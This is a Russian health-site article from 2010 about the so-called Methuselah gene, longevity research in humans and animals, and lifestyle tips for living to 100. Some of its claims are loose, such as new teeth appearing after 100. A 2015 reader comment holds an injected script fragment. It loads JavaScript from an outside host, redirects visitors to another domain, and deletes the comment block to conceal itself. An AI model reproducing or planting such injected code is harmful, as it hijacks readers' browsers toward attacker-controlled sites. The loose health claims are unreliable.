Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ген Мафусаила  >>  Ген Мафусаила
 
Обратная связь
 

Ген Мафусаила

Размер шрифта
27 июля 2010 03:30
  • google_analytics: false
  • Нравится

Дожить до 100 лет и даже больше реально, утверждают многие исследователи. Некоторые люди генетически предрасположены к долгожительству. Группа исследование под руководством Томаса Перлса из Медицинской школы Бостонского университета завершила исследование, согласно которому существует характерные генетические признаки, связанные с повышенной продолжительностью жизни и с пониженным риском развития заболеваний сердечно-сосудистой системы, старческого слабоумия и диабета. Эти сочетания генов встречаются у 15 процентов населения, однако лишь одному из 6000 человек удается прожить дольше 100 лет. Отчего же зависит продолжительность жизни и как ее продлить на максимально возможное количество лет?

 

Милена Сигаева / «Здоровье-инфо»

Мафусаил – старейший человек, чей возраст указан в Библии. Он прожил 969 лет. Его имя считается сейчас нарицательным для обозначения долгожителей. Набор генов долгожительства FOXO3A, обнаруженный в 2008 году учеными одного из американских Университетов, назвали геном Мафусаила. Открытия Мафусаилова гена подтолкнуло ученых многих стран к новым исследованиям этой темы.

От человека к животному

Генетики из института клинической молекулярной биологии из города Киля, Германия тоже изучают биологическую элиту человечества – людей очень преклонного возраста, тех, кому за 100 лет. Почему некоторые люди смогли пережить то, от чего умирали их ровесники – болезни, стрессы и даже голод? За последние 3 года Кильская группа проверила более 3000 человек, перешагнувших 100-летний рубеж. Приблизительно у 1000 из них ученые рассчитывали найти ген, являющийся источником молодости. В конечном итоге, после всех испытаний от первоначального количества осталось не более 10 – 15 претендентов на долгожительство. Их гены подсадили подопытным мышам, чтобы посмотреть, удлинят ли они мышиную жизнь. Руководитель исследовательской группы Доктор Шрайбер говорит: «Исследование долгожителей сегодня – это вопрос изучения старческих болезней, потому что любой человек может заболеть на старости лет. Дело в том, что даже если у вас есть ген, который дает возможность прожить более длинную жизнь, чем остальным, это не значит, что вы станете таким же старым, как Мафусаил». Ген с одноименным названием дает вам только такой шанс в жизни (от него зависит 30%), в остальном, насколько долгой и здоровой будет ваша жизнь, зависит от вашего образа жизни и от системы здравоохранения в стране проживания (70%).

От животного к человеку

Если ученые из Киля шли в своих работах от человека к животному, то другие исследователи идут в обратном направлении. Дело в том, что на свете есть виды животных, которые живут очень долго и умирают молодыми, без болезней и старческих проблем. Ну, чем не человеческая мечта!

 
Фотография с сайта wikipedia.org

Например, в очень многих исследованиях по поиску гена молодости принимает участие голый землекоп. Этот маленький кожаный мешочек с большими зубами и лапками живет в подземных лабиринтах пустыни до 28 лет, при учете, что основная масса грызунов с трудом доживает до 4 лет. Но самое главное, что этот малыш абсолютно не чувствует боли и сердечно-сосудистая система 20-летных землекопов такая же, как и у 2-летних. Просто, дожив до положенного возраста, землекопы умирают.

К живым существам, умирающим молодыми, относятся также крачки и соколы. Некоторые морские черепахи являются явными мафусаилами в своем мире – они живут до 200 лет и больше. Не так давно исследователи обнаружили усатого кита, возраст которого 211 лет. Даже волнистый попугай, исходя из его размеров по сравнению с человеком, доживает до глубокой старости – до 18 лет. Выясняя, почему некоторые животные и птицы не стареют в течение всей жизни, ученые пришли к выводу, что очень многое зависит также и от обменных процессов организма. Например, голые землекопы могут самостоятельно замедлять их, как йоги, и это позволяет им эффективно расходовать энергию. Кислорода под землей немного, но гемоглобин имеет свойство накапливать кислород, поэтому он всасывается в кровь землекопов по мере необходимости.

Синдром Вернера

Также исследователи довольно далеко продвинулись в поисках средств, которые бы останавливали старение. Британские ученые изготовили субстанцию, которая уже показала свою эффективность в лабораторных тестах у пациентов с синдромом Вернера. Люди, которые страдают этой редкой наследственной болезнью, стареют настолько быстро, что в 40 выглядят уже как дряхлые старики. Причем, детство и половое созревание проходят нормально, а с 20 лет появляются такие симптомы болезни, как прозрачная кожа, тонкие волосы, исчезновение подкожно-жирового слоя, на коже появляются пигментные пятна. Тело таких пациентов стареет в 4 раза быстрее нормы. Вещество, разработанное британскими учеными, блокирует определенные процессы в организме этих людей, которые заставляют клетки стареть быстрее.

Приятные известия

Напоследок хотелось бы рассказать о довольно приятных известиях. Каждый год средняя продолжительность жизни жителей планеты растет на целых 3 месяца. К такому выводу пришли исследователи института демографии в Ростоке, Германия. Еще, согласно их заявлениям, старение после 85 года жизни, ощутимо замедляется. Плюс ко всему, в ходе опроса 100-летних жителей планеты большинство из долгожителей заявили, что последние 10 лет относятся к самым здоровым годам их жизни.

Получается, нам с вами надо дотянуть до 85, а дальше уже проблем практически не будет. Говорят, после 100 начинают даже расти новые зубы.

Дожить до 100 лет

Итак, сколько бы лет вам ни было:

  1. Учитесь, учитесь и еще раз учитесь, как говорил известная всем историческая личность.
    Это значит, что для достижения 100-летнего рубежа в здравом уме и твердой памяти нужно, прежде всего, тренировать свой мозг. Можно, например, учить новый для вас иностранный язык. И не говорите, что в вашем возрасте это невозможно. Все возможно, если этого хотеть по-настоящему. Ведь мозг – необычайный орган. Он состоит из 100 миллиардов нервных клеток или нейронов, соединенных друг с другом тысячами миллиардов соединений, которые играют роль телефонных проводников и позволяют нейронам общаться друг с другом. Эти соединения и образуют память. Плохая новость заключается в том, что в ходе процесса старения нейроны умирают. Но есть и хорошая новость – мозг в возрасте способен компенсировать потерю этих нервных клеток, устанавливая новые соединения с другими нейронами. Поэтому многие старые люди часто способны выполнять такую же интеллектуальную работу, как и молодые.
    По поводу существующих долгожителей имеются противоречивые сведения. Многие из утверждающих, что их возраст более 110 лет, не имеют реальных свидетельств о рождении. В книге рекордов Гинесса первое место было у американки Эдны Паркер, которая умерла в возрасте 115 лет. Однако два года назад индийская газета написала о самом старом человеке планеты Набибе Мийан, который умер в возрасте 138 лет. К сожалению, у него тоже не было точных доказательств своего возраста, но работники муниципалитета утверждали, что он всего 70 лет получает пенсию, соответственно ему не может быть больше 129 лет. До пенсии самый старый человек планеты играл на кларнете в королевском оркестре.

    Отправляйтесь в путешествия. Открывайте для себя новые города и пейзажи. Путешествия, как говорят французы, омолаживают людей.
    Научитесь играть на музыкальном инструменте или петь.
  2. Работайте, работайте и еще раз работайте.
    Люди, дожившие до 100 лет, энергично работали в течение своей жизни. Даже долголетие старцев на Кавказе приписывают не только чистому местному воздуху, но и тяжелому физическому труду, который выполняют люди, живущие в горах. В США, исследователи Центра изучения старения и человеческого развития Университета Дьюк доказали, что люди, удовлетворенные своей судьбой и любящие свою работу, живут дольше.
    Старейший токарь планеты Михаил Лимасов уже 80 лет трудится на Ульяновском патронном заводе. В прошлом году ему исполнилось 100 лет. Он встретил свой день рождения у станка.
    Два года назад умер знаменитый российский хирург, академик РАМН Федор Григорьевич Углов. Ему было 103 года. Он говорил: «Индивидуальное бессмертие недостижимо, но продолжительность твоей жизни во многом зависит от тебя самого».
  3. Ведите размеренный образ жизни.
    Опрос общественного мнения обнаружил, что из 1200 человек, достигших столетнего рубежа, 90% вели размеренный образ жизни. Эти люди вставали и ложились в один и тот же час, принимали пищу в определенное время. Некоторая рутина в жизни избавляет человека от беспокойства и от стресса, которые являются разрушительными факторами в развитии старения.
  4. Помогайте ближнему своему
    Не так давно умерший профессор американского Университета, врач Альбер Парри, русский по происхождению, написал работу про жизнь людей на Кавказе. Именно там встречается самый большой процент долгожителей. Он сказал: «Семья и общность на Кавказе дают людям в возрасте ощущение того, что они необходимы и значимы. Ведь именно к ним приходят люди младшего поколения просить совета».
    Интересуйтесь мнением других людей, особенно людей старшего поколения. Помогайте другим, если они нуждаются в помощи.
  5. Старайтесь приспосабливаться к эмоционально-стрессовым ситуациями
    Вы, наверняка, знаете истории пожилых семейных пар, которые умирают один за другим, потому что не в состоянии пережить эмоциональный стресс от потери близкого человека. Все люди, которые доживают до 100-летнего рубежа, пережили смерть родных, однако их разум оказался способным пережить эмоциональный шок и продолжить жить с положительным настроем, не повредив своего физического, умственного и духовного здоровья.
  6. Имейте интересы в жизни
    Люди, которые живут дольше, чем другие, всегда имеют интерес в жизни. У них есть точные цели, которые они стремятся достичь. Совершенно неважно, что это за цель – садоводство или воспитание любимого внука – пока жива ваша страсть, ваш разум будет занят и будет поддерживать ваше тело в добром здравии.
    Американский психотерапевт Сидней Джурард сказал: «Человек живет столь долго, сколь у него имеется смысл в жизни».

 

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.